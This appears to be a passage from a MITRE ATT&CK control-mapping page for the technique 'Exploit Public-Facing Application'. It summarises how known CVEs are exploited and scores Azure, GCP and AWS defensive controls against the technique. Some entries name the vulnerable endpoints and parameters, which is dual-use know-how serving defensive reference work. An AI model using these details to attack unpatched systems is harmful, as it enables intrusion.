                              CVE-2019-18935 Progress Telerik UI for ASP.NET AJAX Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE 2019-18935 is a Insecure Deserialization vulnerability with the Telerik UI, which does not properly sanitize serialized data inputs from the user. This vulnerability leads to the application being vulnerable to RCE attacks that may lead to a full system compromise.
                              References
                              CVE-2018-4939 Adobe ColdFusion Deserialization of Untrusted Data Vulnerability primary_impact T1190 Exploit Public-Facing Application
                              CVE-2017-9805 Apache Struts Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              CVE-2017-9805 is a deserialization vulnerability in the Apache Struts REST Plugin that could allow an attacker to execute arbitrary commands remotely on the affected systems by sending a specially crafted web request to the application.
                              References
                              CVE-2025-23006 SonicWall SMA1000 Appliances Deserialization Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This pre-authentication vulnerability, present in SonicWall SMA1000 appliances running version 12.4.3-02804 or earlier, allows attackers to perform remote code execution on exploited machines, allowing for arbitrary OS command execution.
                              References
                              CVE-2024-20953 Oracle Agile Product Lifecycle Management (PLM) Deserialization Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              An attacker can create a serialized object specifically designed to exploit the deserialization vulnerability, embedding this payload into a request, which is then sent to a WebLogic server, leading to arbitrary code execution.
                              References
                              CVE-2025-53770 Microsoft SharePoint Deserialization of Untrusted Data Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This deserialization vulnerability in Microsoft SharePoint allows an unauthenticated remote attacker to execute remote code on the network.
                              References
                              CVE-2025-42999 SAP NetWeaver Deserialization Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This deserialization vulnerability in NetWeaver Visual Composer, when chained with CVE-2025-31324, allows an attacker to execute unauthenticated remote code with administrator privileges, leading to consequences such as web shell deployment.
                              References
                              CVE-2023-36851 Juniper Junos OS SRX Series Missing Authentication for Critical Function Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a Missing Authentication for Critical Function weakness in Juniper Networks Junos OS on SRX Series devices. Attackers leverage this vulnerability to impact file system integrity by sending a crafted request to the `webauth_operation.php` endpoint, which does not require authentication. This manipulation allows attackers to cause limited impact to the file system integrity, potentially enabling further exploitation.
                              References
                              CVE-2023-36847 Juniper Junos OS EX Series Missing Authentication for Critical Function Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a Missing Authentication for Critical Function weakness in Juniper Networks Junos OS on EX Series devices. Attackers leverage this vulnerability to impact file system integrity by sending a crafted request to the `installAppPackage.php` endpoint, which does not require authentication. This manipulation allows the upload of arbitrary files via J-Web, leading to a loss of integrity for a certain part of the file system and enabling attackers to chain this vulnerability with others, potentially leading to further exploitation.
                              References
                              CVE-2023-36846 Juniper Junos OS SRX Series Missing Authentication for Critical Function Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a Missing Authentication for Critical Function weakness. Attackers leverage this vulnerability to impact file system integrity by sending a crafted request to the `user.php` endpoint, which does not require authentication. This manipulation allows the upload of arbitrary files, enabling attackers to chain this vulnerability with others, potentially leading to unauthenticated remote code execution.
                              References
                              CVE-2023-35081 Ivanti Endpoint Manager Mobile (EPMM) Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This vulnerability is exploited through a path traversal flaw in Ivanti EPMM. Attackers initiate this vulnerability by leveraging authenticated administrative access to remotely write arbitrary files onto the server. This enables them to deploy additional payloads, potentially granting further access and compromising the system. This vulnerability is often used in conjunction with CVE-2023-35078 (along with others) that provides unauthenticated access, enhancing the attack's capabilities. It has been actively exploited, impacting victims by leveraging both vulnerabilities together.
                              References
                              CVE-2018-13379 Fortinet FortiOS SSL VPN Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This is a path traversal vulnerability that allows adversary to download system files through specially-crafted HTTP requests.
                              References
                              CVE-2013-0629 Adobe ColdFusion Directory Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This is an exploitation of a public-facing server due to password misconfiguration. Exploitation allows attackers to access restricted directories.
                              References
                              CVE-2010-2861 Adobe ColdFusion Directory Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This is the exploitation of a public facing server. In-the-wild reporting documents that exploitation of this vulnerability was used to install a webshell on the victim machine, and then captured and exfiltrated client credit card information.
                              References
                              CVE-2024-57727 SimpleHelp Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              Due to improper handling of HTTP request input, attackers can exploit a path traversal vulnerability in SimpleHelp version 5.5.7 and prior to gain access to critical user data stored in SimpleHelp, such as credentials. From there, with the credentials, they can further compromise the system, such as with code execution.
                              References
                              CVE-2024-55550 Mitel MiCollab Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              Due to improper input sanitization, a user with administrative credentials can access and read arbitrary files on the MiCollab server.
                              References
                              CVE-2024-48248 NAKIVO Backup and Replication Absolute Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              An unauthenticated attacker can send a request to the NAKIVO Backup & Replication endpoint that contains a path to a sensitive file, leading to arbitrary file read.
                              References
                              CVE-2024-13161 Ivanti Endpoint Manager (EPM) Absolute Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              An attacker can exploit this vulnerability to coerce credential relay attacks and gain access to sensitive information.
                              References
                              CVE-2024-13160 Ivanti Endpoint Manager (EPM) Absolute Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              An attacker can exploit this vulnerability to coerce credential relay attacks and gain access to sensitive information.
                              References
                              CVE-2024-13159 Ivanti Endpoint Manager (EPM) Absolute Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              An attacker can exploit this vulnerability to coerce credential relay attacks and gain access to sensitive information.
                              References
                              CVE-2024-0769 D-Link DIR-859 Router Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This path traversal vulnerability in D-Link DIR-859 WiFi routers can lead to information disclosure, such as configuration files. As these devices are end-of-life, the manufacturer has no intention of patching this.
                              References
                              CVE-2023-38950 ZKTeco BioTime Path Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              This directory traversal vulnerability, if exploited using a malicious payload in an HTTP GET request, allows an unauthenticated attacker to access and read arbitrary files, leading to potential exfiltration/disclosure.
                              References
                              CVE-2017-12637 SAP NetWeaver Directory Traversal Vulnerability exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              By exploiting this vulnerability in SAP Netweaver Java, the attacker can inject directory traversal commands, allowing for navigation of the file system beyond intended access. This can additionally lead to the discovery of password stores, as well as information about the host system, providing information that can be used in further attacks.
                              References
                              CVE-2021-36380 Sunhillo SureLine OS Command Injection Vulnerablity exploitation_technique T1190 Exploit Public-Facing Application
                              Comments
                              To trigger this vulnerability, an attacker sends a specially crafted POST request to the webserver at the URL /cgi/networkDiag.cgi . Within this request, the attacker inserts a Linux command as part of the ipAddr or dnsAddr POST parameters. When the webserver processes the POST request, the command the attacker has inserted into the parameter will be executed.
                              References

                              VERIS Mappings

                              Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
                              action.hacking.variety.Exploit misconfig Exploit a misconfiguration (vs vuln or weakness) related-to T1190 Exploit Public-Facing Application
                              action.hacking.variety.SQLi SQL injection. Child of 'Exploit vuln'. related-to T1190 Exploit Public-Facing Application

                              Azure Mappings

                              Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
                              microsoft_sentinel Microsoft Sentinel technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              The Microsoft Sentinel Hunting "Potential IIS code injection attempt" query can detect some potential injection attacks against public-facing applications. The Microsoft Sentinel Analytics "A potentially malicious web request was executed against a web server" query can detect a high ratio of blocked requests and unobstructed requests to a Web Application Firewall (WAF) for a given client IP and hostnam. The coverage for these queries is minimal (e.g. IIS) resulting in an overall Minimal score.
                              References
                              devops_security Microsoft Defender for Cloud: DevOps Security technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This capability can protect against exploitation of public facing applications by ensuring application security is baked into DevOps.
                              References
                              advanced_threat_protection_for_azure_sql_database Advanced Threat Protection for Azure SQL Database technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control may alert on usage of faulty SQL statements. This generates an alert for a possible SQL injection by an application. Alerts may not be generated on usage of valid SQL statements by attackers for malicious purposes.
                              References
                              ai_security_recommendations Microsoft Defender for Cloud: AI Security Recommendations technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control's CORS related recommendations can help lead to hardened web applications. This can reduce the likelihood of an application being exploited to reveal sensitive data that can lead to the compromise of an environment. Likewise this control's recommendations related to keeping Java/PHP up to date for API/Function/Web apps can lead to hardening the public facing content that uses these runtimes. This control's recommendations related to disabling Public network access for Azure databases can lead to reducing the exposure of resources to the public Internet and thereby reduce the attack surface. These recommendations are limited to specific technologies (Java, PHP and CORS, SQL DBs) and therefore provide Minimal coverage leading to a Minimal score.
                              References
                              alerts_for_windows_machines Alerts for Windows Machines technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control's Fileless Attack Detection identifies shellcode executing within process memory, including shellcode executed as a payload in the exploitation of a software vulnerability. Detection is periodic at an unknown rate. The following alerts may be generated: "Fileless attack technique detected", "Fileless attack behavior detected", "Fileless attack toolkit detected", "Suspicious SVCHOST process executed".
                              References
                              azure_network_watcher_traffic_analytics Azure Network Watcher: Traffic Analytics technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control can detect anomalous traffic to and from externally facing systems with respect to network security group (NSG) policy.
                              References
                              azure_policy Azure Policy technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control may provide recommendations to restrict access to applications that are public facing and providing information on vulnerable applications.
                              References
                              azure_update_manager Azure Update Manager technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control provides partial coverage for techniques that exploit vulnerabilities in (common) unpatched software since it enables automated updates of software and rapid configuration change management.
                              References
                              azure_web_application_firewall Azure Web Application Firewall technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control can detect common web application attack vectors.
                              References
                              azure_web_application_firewall Azure Web Application Firewall technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control can protect web applications from common attacks (e.g. SQL injection, XSS).
                              References
                              defender_for_app_service Microsoft Defender for Cloud: Defender for App Service technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control's Fileless Attack Detection identifies shellcode executing within process memory, including shellcode injected to exploit a vulnerability in a public-facing application. Detection is periodic at an unknown rate.
                              References
                              defender_for_azure_sql_databases Microsoft Defender for Azure SQL Databases technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control provides recommendations to patch if SQL server is out of date and to disable unneeded features to reduce exploitable surface area.
                              References
                              defender_for_containers Microsoft Defender for Containers technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control may provide provide information about vulnerabilities within container images. The limited scope of containers and registries that are applicable to this control contribute to the lower score.
                              References
                              defender_for_containers Microsoft Defender for Containers technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control may alert on publicly exposed Kubernetes services. This may provide context on services that should be patched or hardened for public access.
                              References
                              defender_for_open_source_databases Microsoft Defender for Open-Source Relational Databases technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control can detect artifacts of common exploit traffic.
                              References
                              just-in-time_vm_access Microsoft Defender for Cloud: Just-in-Time VM Access technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              This control can be configured to completely block inbound access to selected ports until access is requested. This prevents any attempt at exploitation of a public-facing application unless the attacker has the credentials and permissions to request such access. Even if permission has been granted to an authorized user to access the virtual machine, a list of authorized IP addresses for that access can be configured. The score is minimal, since this control only applies to specific applications requiring credentialed access, as opposed to a public webserver
                              References
                              vulnerability_management Microsoft Defender for Cloud: Vulnerability Management technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              Once this control is deployed, it can detect known vulnerabilities in Windows and various Linux endpoints. This information can be used to patch, isolate, or remove vulnerable software and machines. This control does not directly protect against exploitation and it is not effective against zero day attacks, vulnerabilities with no available patch, and software that may not be analyzed by the scanner. As a result, the score is capped at Partial.
                              References

                              GCP Mappings

                              Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
                              mandiant_asm Mandiant Attack Surface Management (ASM) technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              Mandiant Attack Surface Management continuously discovers and assesses an organization's assets for vulnerabilities, misconfigurations, and exposures. This control can discover vulnerable Remote Services offered on the cloud or on hosted servers. Since this monitoring is continual and is derived from Mandiant cyber threat intelligence, this control is scored as significant.
                              References
                              artifact_analysis Artifact Analysis technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              Artifact Analysis performs vulnerability scans on artifacts in Artifact Registry or Container Registry (deprecated). When Artifact Analysis is deployed, it can detect known vulnerabilities in various Linux OS packages. This information can be used to patch, isolate, or remove vulnerable software and machines. This control does not directly protect against exploitation and is not effective against zero day attacks, vulnerabilities with no available patch, and other end-of-life packages.
                              References
                              cloud_armor Cloud Armor technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              Google Cloud Armor security policies protect your application by providing Layer 7 filtering and by scrubbing incoming requests for common web attacks or other Layer 7 attributes. Google Cloud Armor detects malicious requests and drops them at the edge of Google's infrastructure.
                              References
                              cloud_ids Cloud IDS technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              Often used by adversaries to take advantage of software weaknesses in web applications, Palo Alto Network's vulnerability signatures are able to detect SQL-injection attacks that attempt to read or modify a system database using common web hacking techniques (e.g., OWASP top 10). Although there are ways an attacker could leverage web application weaknesses to affect the sensitive data and databases, this technique was scored as significant based on Palo Alto Network's advanced threat detection technology which constantly updates to detect against the latest known variations of these attacks.
                              References
                              google_secops Google Security Operations technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              Google Security Ops triggers an alert based on suspicious behavior, such as exploitation attempts against web servers and/or applications (e.g., F5 BIG-IP CVE 2020-5902). This technique was scored as minimal based on low or uncertain detection coverage factor. https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/proactive_exploit_detection/big_ip/possible_f5_big_ip_tmui_attack_cve_2020_5902_part_1.yaral https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/proactive_exploit_detection/big_ip/possible_f5_big_ip_tmui_attack_cve_2020_5902_part_2.yaral
                              References
                              identity_aware_proxy Identity Aware Proxy technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              When an application or resource is protected by IAP, it can only be accessed through the proxy by principals, also known as users, who have the correct Identity and Access Management (IAM) role. IAP secures authentication and authorization of all requests to App Engine, Cloud Load Balancing (HTTPS), or internal HTTP load balancing. With adversaries that may try to attempt malicious activity via applications, the application Firewalls may be used to limit exposure of applications to prevent exploit traffic from reaching the application.
                              References
                              security_command_center Security Command Center technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              Using Web Security Scanner, SCC is able to detect and provide guidance for web application security risks (e.g., Cross-Site Scripting, SQL injection, Server Side Request Forgery, Insecure Deserialization). Adversaries may exploit these web app weaknesses in a cloud-based environment to compromise the underlying instance or container. This technique was graded as significant due to the high detect coverage against varying forms of this attack.
                              References
                              vm_manager VM Manager technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              VM Manager can apply on-demand and scheduled patches via automated patch deployment. This can remediate OS and software vulnerabilities that could otherwise be exploited. Since VM Manager doesn't directly prevent exploitation of active vulnerabilities (including zero day vulnerabilities) this control has resulted in a score of Partial.
                              References
                              vpc_service_controls VPC Service Controls technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              VPC security perimeters can segment private resources to further reduce user access and operate in a logically separate hosting environment.
                              References

                              AWS Mappings

                              Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
                              amazon_guardduty Amazon GuardDuty technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              There is a GuardDuty finding type that captures when vulnerable publicly facing resources are leveraged to capture data not intended to be viewable (e.g., IAM credentials associated with the resource). UnauthorizedAccess:EC2/MetadataDNSRebind - This finding type only detects MetadataDNSRebind and is more focused on the EC2 instance and not the application running on the instance itself resulting in Minimal coverage.
                              References
                              amazon_inspector Amazon Inspector technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              Amazon Inspector can detect known vulnerabilities on various Windows and Linux endpoints. Furthermore, the Amazon Inspector Best Practices assessment package can assess security controls for "Enable Address Space Layout Randomization (ASLR)" and "Enable Data Execution Prevention (DEP)" that makes it more difficult for an attacker to exploit vulnerabilities in software. This information can be used to patch, isolate, and remove vulnerable software and endpoints. Amazon Inspector does not directly protect against exploitation and it is not effective against zero-day attacks, vulnerabilities with no available patch, and software that may not be analyzed by the scanner. As a result, the score is capped at Partial.
                              References
                              aws_cloudendure_disaster_recovery AWS CloudEndure Disaster Recovery technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              AWS CloudEndure Disaster Recovery enables the replication and recovery of servers into AWS Cloud. In the event that a public-facing application or server is compromised, AWS CloudEndure can be used to provision an instance of the server from a previous point in time within minutes. As a result, this mapping is given a score of Significant.
                              References
                              aws_config AWS Config technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              The following AWS Config managed rules can identify configuration problems that should be fixed in order to ensure that applications intended for internal use cannot be accessed externally for exploitation: "api-gw-endpoint-type-check" can ensure that Amazon API Gateway APIs are private and can only be accessed from within VPCs, "elasticsearch-in-vpc-only" can ensure that Amazon ElasticSearch Service (Amazon ES) domains are in the same VPC and the domain endpoint is not public, "lambda-function-public-access-prohibited" can verify that AWS Lambda functions are not publicly available, and "ec2-instance-no-public-ip" can verify whether EC2 instances have public IP addresses. The following AWS Config managed rules can identify configuration problems that should be fixed in order to ensure that insecure applications are not installed and installed packages are kept updated, reducing the likelihood of adversary exploitation: the "ec2-managedinstance-applications-blacklisted" managed rule verifies that a pre-defined list of applications are not installed on specified managed instances. It can be used to identify the presence of vulnerable applications (prompting removal before they can be exploited) and/or to identify the presence of allowed packages below a minimum version (prompting updates before they can be exploited). The "ec2-managedinstance-platform-check" managed rule verifies that managed instances are running desired platform types, including using a desired version (as opposed to an out-of-date one). Both can reduce instances' attack surface for adversary exploitation. "rds-automatic-minor-version-upgrade-enabled" can verify that Amazon RDS is being patched, and "elastic-beanstalk-managed-updates-enabled" can verify that Elastic Beanstalk is being patched. Coverage factor is partial for these rules, since they are specific to a subset of the available AWS services that can be used to host public-facing applications and will only protect against certain forms of identifiable exploitation, resulting in an overall score of Partial.
                              References
                              aws_rds AWS RDS technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              AWS RDS supports the automatic patching of minor versions of database instances. This can result in security flaws in the database instances being fixed before they can be exploited. This mapping is given a score of Partial because it does not protect against misconfigured database instances which may be susceptible to exploitation.
                              References
                              aws_rds AWS RDS technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              AWS RDS supports the replication and recovery of database instances. In the event that a database instance is compromised, AWS RDS can be used to restore the database instance to a previous point in time. As a result, this mapping is given a score of Significant.
                              References
                              aws_security_hub AWS Security Hub technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              AWS Security Hub reports on EC2 instances that are missing security patches for vulnerabilities which could enable an adversary to exploit vulnerabilities through the attack lifecycle. AWS Security Hub provides this detection with the following managed insight. EC2 instances that have missing security patches for important vulnerabilities This is scored as Partial because the checks associated with Security Hub would only report on missing patches for known vulnerabilities. It doesn't not cover zero-day vulnerabilities.
                              References
                              aws_web_application_firewall AWS Web Application Firewall technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              The AWS WAF protects public-facing applications against a range of vulnerabilities including those listed in the OWASP Top 10. AWS WAF provides this protection via the following rule sets that block malicious traffic across a variety of operating systems and applications. AWSManagedRulesCommonRuleSet AWSManagedRulesKnownBadInputRuleSet AWSManagedRulesSQLiRuleSet AWSManagedRulesLinuxRuleSet AWSManagedRulesUnixRuleSet AWSManagedRulesWindowsRuleSet AWSManagedRulesPHPRuleSet AWSManagedRulesWordPressRuleSet This is given a score of Significant because it protects against vulnerabilities across multiple operating systems (Windows, Linux, POSIX) and technologies (JavaScript, SQL, PHP, WordPress). Furthermore, it blocks the malicious content in near real-time.
                              References